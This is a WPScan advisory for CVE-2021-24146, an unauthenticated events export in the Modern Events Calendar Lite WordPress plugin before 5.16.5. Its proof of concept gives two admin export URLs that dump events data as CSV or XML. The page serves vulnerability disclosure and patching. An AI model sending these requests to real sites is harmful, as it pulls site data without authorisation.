WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export

Description

The plugin did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example.

Proof of Concept

https://drive.google.com/file/d/1lLEXDyPp4LcKoCOqYS7A-0Yg_pIQD-ND/view?usp=sharing

/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv
/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml

Affects Plugins

modern-events-calendar-lite
Fixed in version 5.16.5

References

CVE
CVE-2021-24146

Classification

Type

ACCESS CONTROLS

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)

Submitter

khanh

Submitter website
http://research.sun-asterisk.com/
Verified

Yes

WPVDB ID
c7b1ebd6-3050-4725-9c87-0ea525f8fecc

Timeline

Publicly Published

2021-01-29 (about 2 years ago)

Added

2021-01-29 (about 2 years ago)

Last Updated

2021-01-31 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin